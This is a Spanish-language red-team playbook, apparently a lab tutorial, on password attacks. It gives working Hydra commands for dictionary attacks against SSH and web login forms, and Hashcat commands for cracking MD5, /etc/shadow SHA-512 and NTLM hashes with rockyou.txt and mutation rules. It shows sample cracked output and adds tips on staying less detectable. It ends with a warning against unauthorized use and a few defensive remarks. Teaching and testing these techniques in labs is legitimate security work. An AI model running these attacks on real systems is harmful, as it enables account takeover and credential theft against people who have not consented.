Descifrando datos operativos
Descifrando datos operativos
Red Team — Plano de Ataque // 03
Hydra, Hashcat y credenciales filtradas en acción
Las contraseñas siguen siendo el vector de entrada más explotado. No por falta de tecnología — por falta de higiene. En este PlayBook vas a usar Hydra para ataques online y Hashcat para cracking offline, las mismas herramientas que usan los profesionales.
Objetivo de este Protocolo
Al terminar vas a poder ejecutar un ataque de diccionario contra SSH, crackear hashes MD5 y NTLM con Hashcat, y entender por qué estos ataques funcionan y cómo bloquearse.
rockyou.txt tiene 14 millones de contraseñas reales filtradas en 2009. Es el estándar para ataques de diccionario.
# Descomprime si está comprimido:
gunzip /usr/share/wordlists/rockyou.txt.gz
# Cuántas contraseñas tiene:
wc -l /usr/share/wordlists/rockyou.txt
# Las más comunes:
head -20 /usr/share/wordlists/rockyou.txt14344391 /usr/share/wordlists/rockyou.txt
123456
12345
123456789
password
iloveyou
princess
rockyou14 millones de contraseñas y las más comunes siguen siendo "123456" y "password". La mayoría de usuarios reales usan contraseñas que están en esta lista.
Hydra intenta combinaciones de usuario/contraseña contra SSH de forma automatizada. Sin rate limiting esto funciona en segundos.
# Ataque con usuario específico:
hydra -l msfadmin -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.200
# Con lista de usuarios:
hydra -L usuarios.txt -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.200
# Más lento pero menos detectable:
hydra -l admin -P /usr/share/wordlists/rockyou.txt -t 4 ssh://192.168.1.200[22][ssh] host: 192.168.1.200 login: msfadmin password: msfadmin
1 of 1 target successfully completed, 1 valid password foundEn Metasploitable2 el usuario y contraseña son "msfadmin" — está en las primeras líneas de rockyou.txt. Sin rate limiting cualquier login cae igual.
Hydra también ataca formularios de login web. Necesitas los parámetros del form y el mensaje de error cuando falla.
# HTTP POST login:
hydra -l admin -P /usr/share/wordlists/rockyou.txt \
192.168.1.200 http-post-form \
"/login:username=^USER^&password=^PASS^:Invalid credentials"
# Para HTTPS:
hydra -l admin -P /usr/share/wordlists/rockyou.txt \
-s 443 192.168.1.200 https-post-form \
"/login:username=^USER^&password=^PASS^:Invalid credentials""Invalid credentials" debe ser el texto exacto que aparece cuando el login falla. Usa Burp Suite para interceptar el request y obtener los parámetros exactos.
Cuando consigues hashes de una base de datos o /etc/shadow, Hashcat los rompe offline — el servidor nunca sabe.
# Identifica el tipo de hash:
hashid 'HASH_AQUI'
# MD5 (modo 0):
hashcat -m 0 hash.txt /usr/share/wordlists/rockyou.txt
# SHA-512 de /etc/shadow en Linux (modo 1800):
hashcat -m 1800 hash.txt /usr/share/wordlists/rockyou.txt
# NTLM de Windows (modo 1000):
hashcat -m 1000 hash.txt /usr/share/wordlists/rockyou.txt
# Con reglas de mutación:
hashcat -m 0 hash.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule5f4dcc3b5aa765d61d8327deb882cf99:password
Status......: Cracked
Recovered...: 1/1 (100.00%)MD5 sin salt se crackea en millisegundos en una GPU moderna. Nunca uses MD5 para almacenar contraseñas.
Las reglas generan variantes automáticamente: mayúsculas, números al final, sustituciones. Cubre contraseñas como "Password123!" que no están en rockyou.
# Reglas disponibles en Kali:
ls /usr/share/hashcat/rules/
# Aplica best64 (las 64 mutaciones más efectivas):
hashcat -m 0 hash.txt /usr/share/wordlists/rockyou.txt \
-r /usr/share/hashcat/rules/best64.rule
# Combina reglas:
hashcat -m 0 hash.txt /usr/share/wordlists/rockyou.txt \
-r /usr/share/hashcat/rules/best64.rule \
-r /usr/share/hashcat/rules/toggles1.ruleCon best64, "password" genera "Password", "password1", "passw0rd", "P@ssword". Una contraseña que parece segura puede caer en minutos con reglas.
Hydra genera mucho ruido — cada intento fallido es un log en el servidor.
Para ser menos detectable usa -t 4 en vez del default de 16 threads.
El cracking con Hashcat es 100% offline — el servidor nunca sabe que estás crackeando sus hashes.
Nunca ejecutes Hydra contra sistemas sin autorización. Es detectable y es delito.